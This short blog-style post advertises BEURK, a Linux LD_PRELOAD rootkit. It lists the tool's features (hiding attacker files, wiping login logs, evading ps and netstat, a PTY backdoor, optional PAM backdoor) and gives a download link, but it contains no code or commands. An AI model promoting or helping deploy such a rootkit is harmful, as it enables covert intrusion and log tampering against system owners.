BEURK – Linux Userland Preload Rootkit

BEURK is an userland preload rootkit for GNU/Linux, heavily focused around anti-debugging and anti-detection.

Being a userland rootkit it gives limited privileges (whatever the user has basically) vs a superuser or root level rootkit.

Features

  • Hide attacker files and directories
  • Realtime log cleanup (on utmp/wtmp)
  • Anti process and login detection
  • Bypass unhide, lsof, ps, ldd, netstat analysis
  • Furtive PTY backdoor client

Usage

Compile

Install

Enjoy !

Dependencies

The following packages are not required in order to build BEURK at the moment:

  • libpcap – to avoid local sniffing
  • libpam – for local PAM backdoor
  • libssl – for encrypted backdoor connection

You can download BEURK here:

beurk-dev.zip

Or read more here.

Leave a Reply

Your email address will not be published.